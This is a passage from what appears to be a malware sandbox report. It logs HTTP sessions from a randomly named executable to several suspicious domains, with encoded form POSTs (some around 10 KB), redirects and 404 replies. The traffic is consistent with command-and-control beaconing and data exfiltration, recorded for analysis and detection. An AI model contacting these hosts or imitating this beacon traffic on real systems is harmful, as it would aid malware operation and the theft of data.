                                                                                                                                  Nov 7, 2024 12:55:05.440697908 CET1236INData Raw: 7c 59 17 61 c6 d0 d0 b6 63 75 bc d2 b5 8c a5 d8 98 2a c2 be 58 97 b3 d6 bf 2f ed e2 83 2e 78 27 2b f8 c2 8c 86 00 ce 48 f0 ac b1 30 a7 b1 a9 23 ca b3 f3 2d 53 ae 88 be d1 a0 7b 1c d7 5d 12 90 89 34 e0 55 ac dd 08 83 03 90 f3 e3 50 bc 54 69 11 bb
                                                                                                                                  Data Ascii: |Yacu*X/.x'+H0#-S{]4UPTiXEW)F}rh2u,exjO1jxc#'0!L.<ANvO.km]4EQ\2<1|y./nYaItrU'8(?=MiQZb@i!Qd
                                                                                                                                  Nov 7, 2024 12:55:05.445409060 CET1236INData Raw: d4 a3 3a 85 45 2c f4 37 c2 18 14 92 7d 7b 22 85 42 a0 2f b1 66 bd 64 51 ea 73 59 a5 4d f0 38 72 ee 87 35 95 aa 48 5d 8c 08 4b f2 2e 94 c9 69 cc d4 db 04 54 f2 a0 6b ed 46 78 14 b3 3c 01 ee 3c 2a 3d 46 ae 48 bc 9b 21 97 b8 7a cf 0a da 31 a3 21 77
                                                                                                                                  Data Ascii: :E,7}{"B/fdQsYM8r5H]K.iTkFx<<*=FH!z1!wQSp9o?koM?3LXUYLh0%C)RCE/e^SsMTZbmjG,LE?9T=-9kwMIZ9W0>7H


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  32 | 192.168.2.4 | 50039 | 162.241.85.94 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:07.083199024 CET | 337 | OUT | GET /pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU= HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.papampalli.shop
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:07.800890923 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:07 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Location: http://papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU=
                                                                                                                                  Content-Length: 0
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  33 | 192.168.2.4 | 50040 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:12.916135073 CET | 600 | OUT | POST /63jz/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Origin: http://www.vincemachi.net
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vincemachi.net/63jz/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=V5kt6Tp8hSWKluF1V8rPM9kW6cBVCIMuxgCJmvjAVcP9k9BpEJR2jDZI/D9AbH3y4F8DMVIMtMhsjvPYwSMam8huxKDX0YO816cIjDjtb+cBUzbXYwEjBL8EthxwtSx4LTpHPNMeXI+bX+cl8aCzDK1bzqkfLbyNUdwOxOvWkMqK78Uwnb1rAVAt9WlgMfHWQw==


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  34 | 192.168.2.4 | 50041 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:15.464133024 CET | 620 | OUT | POST /63jz/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Origin: http://www.vincemachi.net
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vincemachi.net/63jz/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=V5kt6Tp8hSWKkOV1TfzPLdkV28BVMoMqxgOJmqbqVOb9lZFpWcl2tjZIrz9BEX374Fx+MU0MtM1sjqzYxlQZgsho8qDR54O816cIjCHLb64BUDrXJhEge78F6Rxw7Sx8LTplPMAnXKGbX+sl/OWyY61d3qlfDYvqTIFYs9CxtfWy66Zq2qU8SVkegRsUBc6fL71lGMcGdmcVdXdNsQtBjOc=


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  35 | 192.168.2.4 | 50042 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:18.025716066 CET | 10702 | OUT | POST /63jz/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Origin: http://www.vincemachi.net
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vincemachi.net/63jz/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH= [TRUNCATED]


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  36 | 192.168.2.4 | 50043 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:20.678822041 CET | 336 | OUT | GET /63jz/?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:21.250017881 CET | 404 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  37 | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:26.407049894 CET | 606 | OUT | POST /k8p1/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Origin: http://www.smileyface.world
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.smileyface.world/k8p1/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=eK5PaD5889bd3zQKMrAcH2sKDSdVg1Y9dDF9jsS7ClxStdS84dhm/aDr7xHu0rNcneg2oKvenN5mjInZ4GLk20LHH2ekHQGvNVDQLFIIL1ImLE+1a2bku6m6jheFrEfn2pGe1Y1i0tk3XPQ2YabVgpIM7ayGPMTV+oAvB6LWifDgUDAs1hzc4xfbWY/t/kRFfA==


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  38 | 192.168.2.4 | 50045 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:28.946497917 CET | 626 | OUT | POST /k8p1/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Origin: http://www.smileyface.world
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.smileyface.world/k8p1/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=eK5PaD5889bd3SAKNM0cQGsJMydVpVY5dDJ9jtWrCTJSt4285YVm+aDrzRHv6LNbnetLoKTenNtmjK/Z41jnwkL/MWemZgGvNVDQLEtlLxcmL1O1cnbrnam1yheFvEeP2pHL1aRI0vc3XKs2WvnW35IO06zuIPK409xeMcbulMyYVFN2kQSLqx7oLf2ZynsMEN9rI738wXG9JZHSeh6q/1k=


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  39 | 192.168.2.4 | 50046 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:31.497761011 CET | 10708 | OUT | POST /k8p1/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Origin: http://www.smileyface.world
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.smileyface.world/k8p1/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Data Ascii: NBfdCRyH= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:55:34.034862041 CET | 338 | OUT | GET /k8p1/?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 7, 2024 12:55:34.665364981 CET | 404 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:34 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50048 | 188.114.97.3 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:55:39.773663998 CET | 606 | OUT | POST /42jb/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Origin: http://www.dodsrprolev.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.dodsrprolev.shop/42jb/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=8MHxMnB1pko8nWkIsHJ0SU2d4ZJgGpOF8p8Rg4XaDyYAPkWNwlgOCPqePY1QFNIB8ikcj+onwMatqFXX/K7eVp1qSX0bMSLrC9vcGafE5lhWLYL6i1IcPkeEQq2atCZVX5uzDNO8S7W5gyDCQJRyIwh+YWdynvbud2/s7ak0pghm7kK1wDIH0Mbp3fCR0T/maA==
Nov 7, 2024 12:55:40.571367025 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:40 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pF8gyx8BgWQvl6njJX8RtKkdzdNWi8UJOfjKSfQK3evL9M9XZyETjwUCNpeSOxxdeF3BTuNzo5fUWN7AoDJUnfay7yTRcRC4hAK0rKn2cc2jhq%2BgwIUWWgZvFftDAC2Goi4T7oE7Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22b86aa40c17-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=606&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 7, 2024 12:55:40.571569920 CET | 341 | IN | [continuation of the gzip-compressed response body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 188.114.97.3 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:55:42.384443998 CET | 626 | OUT | POST /42jb/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Origin: http://www.dodsrprolev.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.dodsrprolev.shop/42jb/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=8MHxMnB1pko81m0Iqkh0U02akpJgMJPO8pgRg5TzDEAAPEGNi3EOBPqeA41JLtII8ioUj9wnwMOtqEHX/6HfV51sZ30ZDyLrC9vcGaL+5lJWLNb6hWQTR0ebHa2a7yZRX5urDMjrS5u5g2TCQYRxCwgUFGdmnNHnQFOnkrEyjThb6iHvhypQmM/aqYLl5QCvBBAd3dNZgaGBOHfv/zDqDeY=
Nov 7, 2024 12:55:43.176357031 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:43 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRFEoabB8Hv3riI7m0DsKcR5gvkEiEgVoAf%2FpMxfp1%2BP9pPaSOgu8SnIiR5Ikm0pat40sACAGJ6tUZffhpPaa9Jum4uuYXm1nTeASd6y%2FVlYHcRxZQ2DBG0juZl%2FnYoOVwy0SCzVbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22c8b82447af-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 7, 2024 12:55:43.176386118 CET | 352 | IN | [continuation of the gzip-compressed response body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 188.114.97.3 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 12:55:44.935820103 CET | 10708 | OUT | POST /42jb/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Origin: http://www.dodsrprolev.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.dodsrprolev.shop/42jb/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Data Ascii: NBfdCRyH= [TRUNCATED]
Nov 7, 2024 12:55:45.798366070 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:45 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULdGMbCLzBB8DifIneHL5xWL6ghBSLJQnVmV%2FcPIF81TcLeayqHEbckrdbLEpsaeQvxZr3XPJrAqrEoF%2B363%2F7Hved3arWUZ2NVpo1YQOCrE%2FwB6I4FS8xMBem3L4e1Z%2BJx3xO76Jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22d90b228789-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10708&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Nov 7, 2024 12:55:45.798382044 CET | 357 | IN


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  44 | 192.168.2.4 | 50051 | 188.114.97.3 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:47.473350048 CET | 338 | OUT | GET /42jb/?NBfdCRyH=xOvRPSdGlVcg4ggtvlNaQF7r/q5ZE7OS64NTuszpJDlgcn3f2GAJOICwQ4poJfJ85RMy/fsotNCJs0/3zrWyWPthfBhIBxngO9nzBLvphHFnKcLlmUkHPG0=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:48.344841003 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:48 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u16ROvnUPrlzsorWDte7SiCsVBtaHpQDr%2FqD7s4Rm28Sb3Dw95aI%2FD2IbGTCBWV4UJffXhS9XYizULmnZDhcEWiIJUNmu19uRm7oaDRrPkJmW1a1NEZ0Z8%2F4c%2F8GV6feRrUu8iK5TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22e8e9d07d5d-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=338&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                                                                                                                                  Nov 7, 2024 12:55:48.344862938 CET | 1006 | IN
                                                                                                                                  Data Ascii: -size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin
                                                                                                                                  Nov 7, 2024 12:55:48.344907045 CET | 5 | IN
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  45 | 192.168.2.4 | 50052 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:53.481245041 CET | 624 | OUT | POST /l7yl/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Origin: http://www.optimallogics.services
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.optimallogics.services/l7yl/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=hSCgej2Mc754t53hlUhsXVBziWz126KVMVblbNKBQTifZvo4i5fifH7/Q36XzDGufL4hstZ98pWh97X80zT3OOcnNk6X9sUgylhKQs+h6dvwVus1Zr1rTd6YVd2Tro3gJ7TJQobDKuJg+oJQ5p1Giz9gnycIB5fkXtrttg0NnYgGrVwfr5J0Jfp2/MVUI5sMjg==


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  46 | 192.168.2.4 | 50053 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:56.035095930 CET | 644 | OUT | POST /l7yl/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.optimallogics.services
